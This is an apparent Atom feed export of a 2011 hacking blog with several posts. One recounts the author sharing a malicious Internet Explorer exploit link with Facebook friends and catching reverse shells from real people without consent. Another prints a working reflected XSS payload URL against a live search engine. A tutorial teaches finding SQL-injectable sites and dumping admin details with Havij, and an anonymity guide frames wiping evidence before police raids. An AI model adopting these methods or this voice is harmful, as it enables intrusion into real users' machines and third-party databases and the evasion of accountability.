height=&quot;346&quot; src=&quot;http://1.bp.blogspot.com/-GEIsDTMrYMM/TuDswYwtQNI/AAAAAAAAA84/Cgp_trtbllc/s400/anon2.PNG&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Once the network is setup, it will automatically start firefox browser which you can use for anonymous surfing. Now there is another step you can do in order to prevent websites from tracking your activities by installing cookies.&lt;br /&gt;In the firefox instance, click on TOOLS, then click START PRIVATE BROWSING.&lt;br /&gt;This will further add anonymity to your activities.&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://4.bp.blogspot.com/-g_TvvtMhU6w/TuD0KwmGsLI/AAAAAAAAA9A/SRJF7e9mHjU/s1600/anon3.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;206&quot; src=&quot;http://4.bp.blogspot.com/-g_TvvtMhU6w/TuD0KwmGsLI/AAAAAAAAA9A/SRJF7e9mHjU/s400/anon3.PNG&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;What did just happen? Why a Virtual machine? Why not setup a tor network directly? Lots of questions. Let us address them.&lt;br /&gt;&lt;br /&gt;The reason why we are using a virtual machine in this tutorial is that it will be like building a virtual identity for you. Whenever you have to perform some private task then you can move to the virtual machine and when you have to do normal browsing then you can switch back to the host operating system.&lt;br /&gt;The other reason for using VM is that you can spoof its MAC address and in turn protect your real MAC address. This increases your anonymity as both the IP address and the MAC address are fake now.&lt;br /&gt;So the combination of VM and VPN makes it hard to trace you back.&lt;br /&gt;Further more its really easy to delete the complete virtual drive that you have created for installing Windows XP virtual machine and remove all traces. All your activities and logs will be deleted in a go( in case police raids you :-) ). Further more, before closing the virtual machine you can use a tool like &lt;a href=&quot;http://www.ccleaner.com/&quot; target=&quot;_blank&quot;&gt;ccleaner&lt;/a&gt;&amp;nbsp;to clean all your internet activities. It will delete the entire browing history, cookies, cache etc.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: red;&quot;&gt;There is an important point to&amp;nbsp;remember&amp;nbsp;while using this setup : Never use your real information on any website while browsing.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;While using this setup make sure that you don&#39;t log into website using your real information. This is the reason why this&amp;nbsp;setup&amp;nbsp;seperates your real identity with your virtual identity while surfing the internet.&lt;br /&gt;I cant say too much about what is the reason for it but if you are a real hacker who is looking to hide his activities then you must be getting what I mean to say.&lt;br /&gt;Another thing that can truly turn you anonymous is by using a paid VPN service. They offer good bandwidth and great level of anonymity by bouncing and relaying connections multiple times. So if you use use a paid VPN in this setup then it will turn you completely anonymous.&lt;br /&gt;This is a completely unique post. I didn&#39;t find anything of this sort on the internet but I have been using this setup from quiet some time. If you have any queries about this post then add your comments here. There are still lots of ways by which you can improve this setup to make your completely&amp;nbsp;untraceable. I am still exploring it. I want you all to work with me and see if you can make improvements in this post. I will add changes as updates. Looking forward for suggestions.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;DARKLORD!!&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/6468968895363579875/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackingalert.blogspot.com/2011/12/complete-guide-to-staying-anonymous-on.html#comment-form' title='6 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/6468968895363579875'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/6468968895363579875'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/2011/12/complete-guide-to-staying-anonymous-on.html' title='Complete Guide to staying Anonymous on Internet - Combining VMs and VPNs'/><author><name>abhinav singh</name><uri>http://www.blogger.com/profile/03102629587741077690</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://2.bp.blogspot.com/_MMJcoBRgsn4/SemPx5VvY3I/AAAAAAAAAA4/VZyEY96SW6o/S220/abhinavbom.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-hqHLI6fQe3Q/TuD538Q3CVI/AAAAAAAAA9I/JxxRQAewB44/s72-c/images.jpg" height="72" width="72"/><thr:total>6</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7708828398385990720.post-1137867959960765633</id><published>2011-12-05T00:56:00.000+05:30</published><updated>2011-12-05T00:56:45.074+05:30</updated><title type='text'>HackingAlert Enters Beta phase for Renewation</title><content type='html'>&lt;script src=&quot;http://connect.facebook.net/en_US/all.js#xfbml=1&quot;&gt;&lt;/script&gt;&lt;fb:like href=&quot;http://www.facebook.com/pages/HackingAlert/131456493581478&quot; layout=&quot;button_count&quot; show_faces=&quot;true&quot; width=&quot;450&quot; font=&quot;arial&quot;&gt;&lt;/fb:like&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-I0DM-fRtiJU/TtvJIKqjUwI/AAAAAAAAA8o/2cQAAuBaPww/s1600/ha2.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://3.bp.blogspot.com/-I0DM-fRtiJU/TtvJIKqjUwI/AAAAAAAAA8o/2cQAAuBaPww/s1600/ha2.PNG&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Hello friends. Yeas 2011 has been a very good &amp;nbsp;for HackingAlert. Especially the last 5 months. The blog has seen tremendous growth over this year. Lots of new reader and followers joined it and also encouraged me with their comments and suggestions. Day by day , month by month the traffic kept on growing and today HackingAlert is amongst the high ranked blogs in terms of hacking and network security.&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Change is not only the law of nature, its the law of web world as well. Change is necessary to eradicate the issues and shortcomings to make things more and more user friendly and rich. HackingAlert is also ready to move for a change. A change that will make it more fast, flexible and user friendly.&lt;br /&gt;&lt;br /&gt;HackingAlert has been operating on the same theme and layout style from past couple of years. There are lots of things which needs a new look and feel in the blog. HackingAlert is going to complete its 3 years of operation in January next year. So with the aim of bringing a better user experience, HA is entering into beta phase for the month of December. The blog will undergo complete over-hauling in this course of one month and lots of new features will be added.&lt;br /&gt;&lt;br /&gt;Some of the expected features that I am targeting for now are :&lt;br /&gt;&lt;br /&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;Better layout and template style.&lt;/li&gt;&lt;li&gt;Better commenting options&lt;/li&gt;&lt;li&gt;Change in tab contents&lt;/li&gt;&lt;li&gt;Faster loading time&amp;nbsp;&lt;/li&gt;&lt;li&gt;Easier methods for social sharing of blog contents&lt;/li&gt;&lt;li&gt;Make it more content rich.&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;As for now these are the few things in my mind. I will request my readers to please provide suggestions which they feel should be brought in this blog. The biggest strength of any blog is its readers and their experience with it. So i will humbly request all my readers to add valuable suggestions in the comment box below to make HackingAlert a better place and leave a bigger impact in the year 2012.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/1137867959960765633/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackingalert.blogspot.com/2011/12/hackingalert-enters-beta-phase-for.html#comment-form' title='11 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/1137867959960765633'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/1137867959960765633'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/2011/12/hackingalert-enters-beta-phase-for.html' title='HackingAlert Enters Beta phase for Renewation'/><author><name>abhinav singh</name><uri>http://www.blogger.com/profile/03102629587741077690</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://2.bp.blogspot.com/_MMJcoBRgsn4/SemPx5VvY3I/AAAAAAAAAA4/VZyEY96SW6o/S220/abhinavbom.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-I0DM-fRtiJU/TtvJIKqjUwI/AAAAAAAAA8o/2cQAAuBaPww/s72-c/ha2.PNG" height="72" width="72"/><thr:total>11</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7708828398385990720.post-2471473831990443587</id><published>2011-12-04T01:08:00.000+05:30</published><updated>2011-12-04T01:58:33.430+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="facebook hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="hacking tutorial"/><category scheme="http://www.blogger.com/atom/ns#" term="technical article"/><title type='text'>When Social Networks Become Social Engineering Tools for hacking - A Case study of hacking 10 Facebook friends in 10 minutes</title><content type='html'>&lt;script src=&quot;http://connect.facebook.net/en_US/all.js#xfbml=1&quot;&gt;&lt;/script&gt;&lt;fb:like href=&quot;http://www.facebook.com/pages/HackingAlert/131456493581478&quot; layout=&quot;button_count&quot; show_faces=&quot;true&quot; width=&quot;450&quot; font=&quot;arial&quot;&gt;&lt;/fb:like&gt; &lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-Sm5JQN6Cc0E/TtqFTv7ihfI/AAAAAAAAA8U/cuEilsycR4k/s1600/logo.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;144&quot; src=&quot;http://1.bp.blogspot.com/-Sm5JQN6Cc0E/TtqFTv7ihfI/AAAAAAAAA8U/cuEilsycR4k/s320/logo.PNG&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;These days hacking community is buzzing with social engineering techniques for hacking. People discuss what can be the best social engineering technique they can adopt. These days I am addicted to 2 things very badly. One is metasploit and other is Social networks( facebook to be precise).&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;So I though of mixing these two addictions of mine to craft a special Social engineered attack vector. I don&#39;t know weather anyone has ever thought or used this technique before but HackingAlert is certainly the first to report about it( If its not on google, its no where).&lt;br /&gt;&lt;br /&gt;In my attack vector I created a malicious url that exploited a known vulnerability of Internet explorer. Then I shared this link on social media through my account. Now here comes the concept of Social engineering. Since the malicious link is posted on my wall or in my tweet so everyone in my friend list or followers tends to trust it.&lt;br /&gt;They consider it as a normal link to some useful information. This is where the use of social mediums like Facebook becomes prankey.&lt;br /&gt;&lt;br /&gt;In my several posts I have always laid stress that we should not trust everything that appears in your feed or tweets. No matter if it is shared by our friend or&amp;nbsp;colleague. You should first examine it and see weather it looks suspicious or not. The best way is to Right click and copy the link and open it in a different browser. This will protect your social identity from any threat like spam or session hijacking etc.&lt;br /&gt;&lt;br /&gt;Let me give you a quick look at my attack vector. Here is the link that I shared on my wall which appeared in all my friend&#39;s feeds.&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-6v27eVHibW4/Ttp-GTBqaUI/AAAAAAAAA8E/Yff54uZIZKo/s1600/hack1.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;227&quot; src=&quot;http://2.bp.blogspot.com/-6v27eVHibW4/Ttp-GTBqaUI/AAAAAAAAA8E/Yff54uZIZKo/s400/hack1.PNG&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;Immediately&amp;nbsp;after sharing this link, my friends started commenting and clicking on it. It is just a malicious link which can exploit a vulnerability in Internet Explorer and allow&amp;nbsp;arbitrary&amp;nbsp;code execution.&amp;nbsp;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;So all I had to do now is set up a&amp;nbsp;listener&amp;nbsp;for back connections and sit back and wait. It&#39;s exactly like catching a fish. You attach some food in the hook and wait for fish to come and eat it and in-turn get caught (hacked). &amp;nbsp;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;Look at the image below. Lots of IP addresses were reported in my console. Those who were lucky (not using IE) got rid of this attack. The error &quot;.net CLR not found&quot; represents those calls in which Internet explorer was not the browser in use.&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-M5Ze2lxQY2Q/TtqAgZ22vxI/AAAAAAAAA8M/WPFleDJCGCQ/s1600/hack2.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;336&quot; src=&quot;http://1.bp.blogspot.com/-M5Ze2lxQY2Q/TtqAgZ22vxI/AAAAAAAAA8M/WPFleDJCGCQ/s640/hack2.PNG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&amp;nbsp;If you notice the scroll bar in the right of the image then you can imagine how many back connection requests I got.&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;The luck ones who wrere not using IE were safe but there were some unlucky ones as well. To be precise I got around 10 active sessions in first 10 minutes. And then I tweeted the link on twitter with a catchy statement. In an hour I had more acive sessions than I can remember.&amp;nbsp;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;Successful execution of this attack vector provided me with a direct shell connectivity through which I could control the attacked users. It will be a cake walk to start a key sniffer to record key strokes or at worse install backdoors ( though I didn&#39;t do these things).&amp;nbsp;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;There is&amp;nbsp;something&amp;nbsp;serious I want to discuss here. If you have followed everything so far in this post then you might have figured out that there is hardly anything that Facebook can do to prevent this types of attacks.&amp;nbsp;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;If my friend is using an unpatched version of IE browser and opens any link which appears in his social profile without giving it a second look then this is his mistake. Its like banging your own head on the wall.&amp;nbsp;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;So I will end this post with two conclusions which I want that all my readers should follow strictly :&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;/div&gt;&lt;ol style=&quot;text-align: left;&quot;&gt;&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&lt;b&gt;Always use an updated version of browsers.&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&lt;b&gt;Don&#39;t trust everything that people share on their social profiles. You never know when you can become the FISH caught in the hook.&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;Note : If you are one of my friends who read this post and also clicked on the link which I shared then I am really sorry. I had to do this in order to build this post. But I have caused no harm to your system. It was purely educational purpose. Hope you are not offended.&amp;nbsp;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;DARKLORD!!&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/2471473831990443587/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackingalert.blogspot.com/2011/12/when-social-networks-become-social.html#comment-form' title='10 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/2471473831990443587'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/2471473831990443587'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/2011/12/when-social-networks-become-social.html' title='When Social Networks Become Social Engineering Tools for hacking - A Case study of hacking 10 Facebook friends in 10 minutes'/><author><name>abhinav singh</name><uri>http://www.blogger.com/profile/03102629587741077690</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://2.bp.blogspot.com/_MMJcoBRgsn4/SemPx5VvY3I/AAAAAAAAAA4/VZyEY96SW6o/S220/abhinavbom.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-Sm5JQN6Cc0E/TtqFTv7ihfI/AAAAAAAAA8U/cuEilsycR4k/s72-c/logo.PNG" height="72" width="72"/><thr:total>10</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7708828398385990720.post-871717903236906508</id><published>2011-12-03T02:05:00.001+05:30</published><updated>2011-12-03T02:34:46.642+05:30</updated><title type='text'>XSS vulnerability in Babylon search</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-g18F3ezAoVs/Ttk6TfL4IDI/AAAAAAAAA78/5GSErN7UL9g/s1600/bab.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;208&quot; src=&quot;http://2.bp.blogspot.com/-g18F3ezAoVs/Ttk6TfL4IDI/AAAAAAAAA78/5GSErN7UL9g/s320/bab.PNG&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Recently I installed a software which changed my default search of firefox to Babylon search. It is a popular search engine and ranks high in alexa. The search engine can be reached at&amp;nbsp;&lt;a href=&quot;http://search.babylon.com/home&quot;&gt;http://search.babylon.com/home&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;The search engine is vulnerable to a perticular type of XSS attack. Since no one has ever reported about a vulnerability in this search engine so I can take the credit ( cool man! ) .&lt;br /&gt;&lt;br /&gt;The search engine can be XSSed by first adding a normal string at the beginning and then add the script. Since the search engine has implemented XSS filtering so it can be bypassed by crafting a different vector.&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-YFvJ8PhbnqQ/Ttk386BMAmI/AAAAAAAAA7s/AITrZEBwAhc/s1600/xss.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;230&quot; src=&quot;http://1.bp.blogspot.com/-YFvJ8PhbnqQ/Ttk386BMAmI/AAAAAAAAA7s/AITrZEBwAhc/s400/xss.PNG&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Notice the search term that I have used here. On executing the script, an alert box will be displayed notifying the successful execution of script.&lt;br /&gt;Here is the complete vulnerable url :&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;http://search.babylon.com/?q=helloworld%3Cscript%3Ealert%28%27hackingalert%27%29%3B%3C%2Fscript%3Ehelloworld&amp;amp;babsrc=home&amp;amp;s=web&amp;amp;as=0&amp;amp;t=0&quot;&gt;http://search.babylon.com/?q=helloworld%3Cscript%3Ealert%28%27hackingalert%27%29%3B%3C%2Fscript%3Ehelloworld&amp;amp;babsrc=home&amp;amp;s=web&amp;amp;as=0&amp;amp;t=0&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-obE6BzwDIm4/Ttk3-pwEC8I/AAAAAAAAA70/ntpVtMSISpw/s1600/xss1.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;401&quot; src=&quot;http://2.bp.blogspot.com/-obE6BzwDIm4/Ttk3-pwEC8I/AAAAAAAAA70/ntpVtMSISpw/s640/xss1.PNG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/871717903236906508/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackingalert.blogspot.com/2011/12/xss-vulnerability-in-babylon-search.html#comment-form' title='11 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/871717903236906508'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/871717903236906508'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/2011/12/xss-vulnerability-in-babylon-search.html' title='XSS vulnerability in Babylon search'/><author><name>abhinav singh</name><uri>http://www.blogger.com/profile/03102629587741077690</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://2.bp.blogspot.com/_MMJcoBRgsn4/SemPx5VvY3I/AAAAAAAAAA4/VZyEY96SW6o/S220/abhinavbom.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-g18F3ezAoVs/Ttk6TfL4IDI/AAAAAAAAA78/5GSErN7UL9g/s72-c/bab.PNG" height="72" width="72"/><thr:total>11</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7708828398385990720.post-2756732865095606856</id><published>2011-12-03T00:44:00.001+05:30</published><updated>2011-12-03T01:40:25.237+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="cracking"/><category scheme="http://www.blogger.com/atom/ns#" term="hack a website/web server"/><category scheme="http://www.blogger.com/atom/ns#" term="hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="hacking tutorial"/><category scheme="http://www.blogger.com/atom/ns#" term="sql injection tool"/><title type='text'>Complete SQL injection tutorial with Havij</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;script src=&quot;http://connect.facebook.net/en_US/all.js#xfbml=1&quot;&gt;&lt;/script&gt;&lt;fb:like font=&quot;arial&quot; href=&quot;http://www.facebook.com/pages/HackingAlert/131456493581478&quot; layout=&quot;button_count&quot; show_faces=&quot;true&quot; width=&quot;450&quot;&gt;&lt;/fb:like&gt;&lt;br /&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-YTQF_g6GPdI/TgGOMgXgQlI/AAAAAAAAAeM/EAsOj88U7Kk/s1600/untitled.bmp&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://2.bp.blogspot.com/-YTQF_g6GPdI/TgGOMgXgQlI/AAAAAAAAAeM/EAsOj88U7Kk/s1600/untitled.bmp&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Hello friends. This is my third post on SQL injection and for the first time I am using a tool for explaining it. Here I will be using a popular and my personal favourite SQLi tool Havij. To download Havij visit the following link - &lt;b&gt;&lt;a href=&quot;http://hackingalert.blogspot.com/2011/07/download-havij-15-most-advanced-sql.html&quot; target=&quot;_blank&quot;&gt;DOWNLOAD HAVIJ&lt;/a&gt;.&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;/b&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;Let us now understand how this tool works. The tutorial can be used for any SQLi tool as the basic functioning is same for all. First thing you need to do is find a vulnerable site.&lt;br /&gt;You can find a detailed SQL injection tutorial - &lt;a href=&quot;http://hackingalert.blogspot.com/2011/10/basic-sql-injection-tutorial-readers.html&quot; target=&quot;_blank&quot;&gt;HERE&lt;/a&gt;.&lt;br /&gt;You can use blind SQL injection technique to figure out weather a site is vulnerable or not.&lt;br /&gt;To check a website for vulnerability, you will first have to reach to a page that accesses the database and is of the form : &lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;www.site.com/product.php?id=23&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Now simply add an apostrophe( &#39; )to the end of url and press enter. If the website replies with an error then it shows that the website is vulnerable to SQL injection. Look at the url in the following image( sorry for the over editing of image but it was really needed) . Notice the &#39; at the end of url and also the error responded from the database.&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://4.bp.blogspot.com/-3r1UJ-VcXdk/TtkqIehdOBI/AAAAAAAAA68/tYmKae0kZJY/s1600/sql0.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;290&quot; src=&quot;http://4.bp.blogspot.com/-3r1UJ-VcXdk/TtkqIehdOBI/AAAAAAAAA68/tYmKae0kZJY/s640/sql0.PNG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;The error will look something like this :&amp;nbsp;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;Warning: mysql_num_rows(): supplied argument is not a valid MySQL&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;So now that we have a vulnerable site for testing, we will now move ahead with using Havij and try to discover admin details of the website. In fact we can dig out every detail from the database using havij. Let us see how.&lt;br /&gt;&lt;br /&gt;1. Start Havij and copy the url in TARGET address.( the same url which we used to test for sql injection vulnerability but without &#39; ).&lt;br /&gt;&lt;br /&gt;2. Click on the ANALYZE button and wait for Havij to discover the database files for you.&lt;br /&gt;&lt;br /&gt;3. At the bottom of the Havij terminal you will see the search progress.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a 